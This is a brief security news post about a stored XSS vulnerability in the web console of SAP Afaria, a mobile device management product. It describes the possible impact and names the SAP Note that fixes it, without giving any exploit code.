The problem with SAP Afaria

Hello everybody!

SAP Afaria, an MDM solution from a world-famous software vendor seems to be having security issues. This can be attacked in different ways using Stored XSS vulnerability.

In brief, MDM is a set of services that could be used to control mobile devices like smartphones, tablets, phablets etc. and establish security measures of corporate data stored and processed on those devices.  This software is designed to help company administrators achieve these tasks. A special application called MDM client is installed on a device and this allows administrators to implement settings.

Afaria is used globally and 140 Afaria servers are available via the Internet. US and China has the most number of Afaria services.

Several SAP Afaria vulnerabilities have been discovered some of which are discussed here.

The administrative part of SAP Afaria performs the basic functionality and is available via browser. System administrator can view a list of all connected devices, create new mobile device configurations, download applications, control devices, etc. from the web console. This is where an XSS vulnerability is found. This can affect the entire system and administrator in particular. Other users do not have access to these functions, yet an injection of user data is possible.


Stored XSS vulnerability: Wrap-up

The XSS vulnerability was closed by SAP. Install SAP Note 2152669 to fix this issue.

This security flaw allows the system to be remotely exploited without authentication, and there are at least 140 of these servers available on the Internet. An attacker can get complete control over all mobile devices of organization, such as remotely wipe data, lock all smartphones, or even force to upload malicious backdoor which will control user’s data, send critical documents to C&C server, spy on employees, read messages, and record video from cameras.


See the detailed analysis with screen shots on:

Source: Akati

Comments are closed.